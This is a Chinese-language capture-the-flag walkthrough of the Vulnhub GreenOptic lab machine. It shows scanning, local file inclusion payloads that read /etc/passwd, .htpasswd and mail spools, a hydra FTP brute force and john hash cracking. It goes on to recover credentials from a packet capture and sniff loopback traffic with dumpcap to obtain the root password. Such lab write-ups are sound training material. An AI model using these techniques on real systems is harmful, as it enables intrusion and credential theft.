Vulnhub之GreenOptics靶机详细测试过程

GreenOptics

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:2b:10:e6      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:31:b2:9c      1      60  PCS Systemtechnik GmbH       

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-28 20:25 EDT
Nmap scan report for inplainsight (192.168.56.254)
Host is up (0.00039s latency).
Not shown: 65377 filtered tcp ports (no-response), 153 filtered tcp ports (host-prohibited)
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.2
22/tcp    open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 462032edf07411edfda7a417abf6f021 (RSA)
|   256 b6fb6410390ef9be8b5ad0d2413e6768 (ECDSA)
|_  256 24270bc9355f277e1a8273e069cc0f96 (ED25519)
53/tcp    open  domain  ISC BIND 9.11.4-P2 (RedHat Enterprise Linux 7)
| dns-nsid: 
|_  bind.version: 9.11.4-P2-RedHat-9.11.4-16.P2.el7_8.6
80/tcp    open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: GreenOptic
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
10000/tcp open  http    MiniServ 1.953 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=utf-8).
|_http-server-header: MiniServ/1.953
MAC Address: 08:00:27:31:B2:9C (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:redhat:enterprise_linux:7

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 184.73 seconds

NMAP扫描结果表明目标主机有5个开放端口:21(ftp)、22(ssh)、53(dns)、80(http)、10000(http)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ curl http://192.168.56.254:10000/                                                             
<h1>Error - Document follows</h1>
<p>This web server is running in SSL mode. Try the URL <a href='https://websrv01.greenoptic.vm:10000/'>https://websrv01.greenoptic.vm:10000/</a> instead.</p>

说明需要添加主机记录到/etc/hosts文件:

┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ sudo vim /etc/hosts                                        
[sudo] password for kali: 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ cat /etc/hosts                   
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.254  websrv01.greenoptic.vm

再次访问:

https://websrv01.greenoptic.vm:10000/

返回页面为用户登录界面,10000端口的信息收集暂时告一段落。

──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ nikto -h http://192.168.56.254                                                                     
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-04-28 20:35:07 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS) PHP/5.4.16
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ PHP/5.4.16 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Retrieved x-powered-by header: PHP/5.4.16
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8724 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2023-04-28 20:36:00 (GMT-4) (53 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

nikto没有得到80端口有价值的信息。

┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              txt,sh,php,js,html
[+] Timeout:                 10s
===============================================================
2023/04/28 20:39:13 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 17119]
/.html                (Status: 403) [Size: 207]
/img                  (Status: 301) [Size: 234] [--> http://192.168.56.254/img/]
/account              (Status: 301) [Size: 238] [--> http://192.168.56.254/account/]
/css                  (Status: 301) [Size: 234] [--> http://192.168.56.254/css/]
/js                   (Status: 301) [Size: 233] [--> http://192.168.56.254/js/]
/LICENSE.txt          (Status: 200) [Size: 17128]
/statement.html       (Status: 200) [Size: 6687]
/.html                (Status: 403) [Size: 207]
Progress: 1321725 / 1323366 (99.88%)===============================================================
2023/04/28 20:41:18 Finished
===============================================================
                                                               

访问/account,返回是另一个用户登录。

http://192.168.56.254/account/index.php?include=cookiewarning

但是注意到URL,此处可能存在本地文件包含漏洞。

┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ curl http://192.168.56.254/account/index.php?include=../../../../etc/passwd       
<!DOCTYPE html>
<html lang="en">

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
sam:x:1000:1000::/home/sam:/bin/bash
terry:x:1001:1001::/home/terry:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
alex:x:1002:1002::/home/alex:/bin/bash
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:997:993:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
monitor:x:1003:1003::/home/monitor:/bin/bash
saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin

</body>
</html>


经过测试,目标页面确实存在本地文件包含漏洞,那接下来的任务就是如何利用该漏洞获得shell了

在Kali Linux上本地启动http.server(可以任意创建一个文本文件用于测试),然后访问以下URL:

http://192.168.56.254/account/index.php?include=http://192.168.56.206:8000/test.txt

从结果来看目标主机不存在远程文件包含漏洞,接下来看是否可以获取用户SSH私钥文件。

逐一测试各个用户(sam, terry, alex, monitor)家目录下/.ssh/id_rsa文件是否存在,如:

http://192.168.56.254/account/index.php?include=../../../../home/monitor/.ssh/id_rsa

经过测试没有获取任何SSH私钥文件。

接下来看是否可以破解这些用户的FTP密码

将所有普通用户生成用户字典:

──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ cat user.dict                                                              
sam
terry
alex
monitor

──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ hydra -L user.dict -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.254  -f
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-28 21:56:28
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 57377596 login tries (l:4/p:14344399), ~3586100 tries per task
[DATA] attacking ftp://192.168.56.254:21/

没有破解出密码。

因为作者给出明显的提示,域名是websrv01.greenoptic.vm,除了websrv01有其他子域名

──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ dig @192.168.56.254 greenoptic.vm axfr

; <<>> DiG 9.18.8-1-Debian <<>> @192.168.56.254 greenoptic.vm axfr
; (1 server found)
;; global options: +cmd
greenoptic.vm.          3600    IN      SOA     websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600
greenoptic.vm.          3600    IN      NS      ns1.greenoptic.vm.
ns1.greenoptic.vm.      3600    IN      A       127.0.0.1
recoveryplan.greenoptic.vm. 3600 IN     A       127.0.0.1
websrv01.greenoptic.vm. 3600    IN      A       127.0.0.1
greenoptic.vm.          3600    IN      SOA     websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600
;; Query time: 4 msec
;; SERVER: 192.168.56.254#53(192.168.56.254) (TCP)
;; WHEN: Fri Apr 28 22:12:31 EDT 2023
;; XFR size: 6 records (messages 1, bytes 235)

利用dig工具发现了recoveryplan子域名,将该子域名添加到/etc/hosts文件中:

──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ sudo vim /etc/hosts                                        
[sudo] password for kali: 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.254  websrv01.greenoptic.vm
192.168.56.254  recoveryplan.greenoptic.vm

访问该子域名,需要网页基本认证,尝试一些弱口令失败,因为基本认证的用户名和密码存在.htpasswd文件中,看能否获取该文件内容

(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ curl http://192.168.56.254/account/index.php?include=../../../../../var/www/.htpasswdstaff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.

</body>
</html>


将密码破解:

┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
wheeler          (?)     
1g 0:00:00:00 DONE (2023-04-29 04:29) 9.090g/s 120436p/s 120436c/s 120436C/s guess1..lorena1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

用上述用户名和密码访问

该帖子中有一个dpi.zip文件,将其下载到Kali Linux本地,而且提到:have e-mailed you the password,因此再用前面的本地文件包含漏洞读取邮件(发给sam的邮件):

http://192.168.56.254/account/index.php?include=../../../../../var/mail/sam
From [email protected]  Sun Jul 12 16:13:45 2020
Return-Path: <[email protected]>
X-Original-To: sam
Delivered-To: [email protected]
Received: from localhost (localhost [IPv6:::1])
	by websrv01.greenoptic.vm (Postfix) with ESMTP id A8D371090085
	for <sam>; Sun, 12 Jul 2020 16:13:18 +0100 (BST)
Message-Id: <[email protected]>
Date: Sun, 12 Jul 2020 16:13:18 +0100 (BST)
From: [email protected]

Hi Sam, per the team message, the password is HelloSunshine123


┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ unzip dpi.zip       
Archive:  dpi.zip
[dpi.zip] dpi.pcap password: 
  inflating: dpi.pcap                
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ ls -alh
total 148M
drwxr-xr-x   2 kali kali 4.0K Apr 29 04:36 .
drwxr-xr-x 121 kali kali 4.0K Apr 28 20:24 ..
-rw-r--r--   1 kali kali 332K Jul 12  2020 dpi.pcap
-rw-r--r--   1 kali kali  71K Apr 29 04:35 dpi.zip
-rw-r--r--   1 kali kali   38 Apr 29 04:29 hash
-rw-r--r--   1 kali kali 148M Apr 28 22:10 hydra.restore
-rw-r--r--   1 root root 1.4K Apr 28 20:28 nmap_full_scan
-rw-r--r--   1 kali kali   12 Apr 28 21:10 test.txt
-rw-r--r--   1 kali kali   23 Apr 28 21:16 user.dict

用上面本地文件包含漏洞读取到的密码解压缩dpi.zip文件,得到dpi.pcap

利用wireshark工具打开pcap文件,可以看到ftp的用户名和密码:

用户名:alex

密码: FwejAASD1

登录FTP服务:

┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 (vsFTPd 3.0.2)
Name (192.168.56.254:kali): alex
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||28596|).
ftp: Can't connect to `192.168.56.254:28596': No route to host
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwx------    3 1002     1002          136 Jul 12  2020 .
drwxr-xr-x    6 0        0              57 Jul 12  2020 ..
-rw-------    1 1002     1002          100 Jul 12  2020 .Xauthority
lrwxrwxrwx    1 0        0               9 Jul 12  2020 .bash_history -> /dev/null
-rw-r--r--    1 1002     1002           18 Apr 01  2020 .bash_logout
-rw-r--r--    1 1002     1002          193 Apr 01  2020 .bash_profile
-rw-r--r--    1 1002     1002          231 Apr 01  2020 .bashrc
drwxr-xr-x    2 1002     1002           41 Jul 12  2020 .wireshark
-rwx------    1 1002     1002           70 Jul 12  2020 user.txt
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for user.txt (70 bytes).
100% |*********************************************************************************|    70       77.50 KiB/s    00:00 ETA
226 Transfer complete.
70 bytes received in 00:00 (54.73 KiB/s)
ftp> pwd
Remote directory: /home/alex

用相同的用户名和密码登录SSH:

──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ ssh [email protected]                                        
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:FkUejrDoIcwfG8KzsYAElBrX2BbWcAHiVWnR8k0k0Kk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
[email protected]'s password: 
[alex@websrv01 ~]$ ls -alh
total 20K
drwx------. 3 alex alex 136 Jul 12  2020 .
drwxr-xr-x. 6 root root  57 Jul 12  2020 ..
lrwxrwxrwx. 1 root root   9 Jul 12  2020 .bash_history -> /dev/null
-rw-r--r--. 1 alex alex  18 Apr  1  2020 .bash_logout
-rw-r--r--. 1 alex alex 193 Apr  1  2020 .bash_profile
-rw-r--r--. 1 alex alex 231 Apr  1  2020 .bashrc
-rwx------. 1 alex alex  70 Jul 12  2020 user.txt
drwxr-xr-x. 2 alex alex  41 Jul 12  2020 .wireshark
-rw-------. 1 alex alex 100 Jul 12  2020 .Xauthority
[alex@websrv01 ~]$ cd ..
[alex@websrv01 home]$ ls -alh
total 0
drwxr-xr-x.  6 root    root     57 Jul 12  2020 .
dr-xr-xr-x. 17 root    root    244 Jul 13  2020 ..
drwx------.  3 alex    alex    136 Jul 12  2020 alex
drwx------.  2 monitor monitor  62 Jul 12  2020 monitor
drwx------.  2 sam     sam      62 Jul 12  2020 sam
drwx------.  2 terry   terry    83 Jul 12  2020 terry
[alex@websrv01 home]$ 

提权

[alex@websrv01 home]$ id
uid=1002(alex) gid=1002(alex) groups=1002(alex),994(wireshark)

发现id隶属于wireshark组,这样alex可以运行wireshark命令行工具dumpcap,即

用dumpcap工具抓包,抓本地环回接口的包,然后将其下载到Kali LInux本地,

利用wireshar k打开:

 AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28=

将其base64解码:

┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
└─$ echo 'AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28=' | base64 -d
rootASfojoj2eozxczzmedlmedASASDKoj3o 

root密码为ASfojoj2eozxczzmedlmedASASDKoj3o:

[root@websrv01 ~]# ls -alh
total 60K
dr-xr-x---.  5 root root 4.0K Jul 13  2020 .
dr-xr-xr-x. 17 root root  244 Jul 13  2020 ..
-rw-------.  1 root root 1.3K Jul 12  2020 anaconda-ks.cfg
lrwxrwxrwx.  1 root root    9 Jul 12  2020 .bash_history -> /dev/null
-rw-r--r--.  1 root root   18 Dec 29  2013 .bash_logout
-rw-r--r--.  1 root root  176 Dec 29  2013 .bash_profile
-rw-r--r--.  1 root root  176 Dec 29  2013 .bashrc
-rw-r--r--.  1 root root  100 Dec 29  2013 .cshrc
drwx------.  2 root root   99 Jul 12  2020 .gnupg
-rw-------.  1 root root   45 Jul 12  2020 .lesshst
-rw-r--r--.  1 root root   32 Jul 12  2020 .monit.id
-rw-------.  1 root root  800 Apr 29 03:22 .monit.state
drwxr-----.  3 root root   19 Jul 12  2020 .pki
-rw-------.  1 root root 1.0K Jul 12  2020 .rnd
-rwx------.  1 root root  837 Jul 12  2020 root.txt
-rw-r--r--.  1 root root  129 Dec 29  2013 .tcshrc
-rw-------   1 root root 5.7K Jul 13  2020 .viminfo
drwxr-xr-x.  2 root root   41 Jul 12  2020 .wireshark
-rw-------.  1 root root   50 Jul 12  2020 .Xauthority
[root@websrv01 ~]# cat root.txt
Congratulations on getting root!

  ____                      ___        _   _      
 / ___|_ __ ___  ___ _ __  / _ \ _ __ | |_(_) ___ 
| |  _| '__/ _ \/ _ \ '_ \| | | | '_ \| __| |/ __|
| |_| | | |  __/  __/ | | | |_| | |_) | |_| | (__ 
 \____|_|  \___|\___|_| |_|\___/| .__/ \__|_|\___|
                                |_|             
  
You've overcome a series of difficult challenges, so well done!

I'm happy to make my CTFs available for free. If you enjoyed doing the CTF, please leave a comment on my blog at https://security.caerdydd.wales - I will be happy for your feedback so I can improve them and make them more enjoyable in the future.

*********
Kindly place your vote on the poll located here to let me know how difficult you found it: https://security.caerdydd.wales/greenoptic-ctf/
*********

Thanks,
bootlesshacker
[root@websrv01 ~]# 

热门相关:仙城纪   夫人,你马甲又掉了!   学霸女神超给力   横行霸道   学霸女神超给力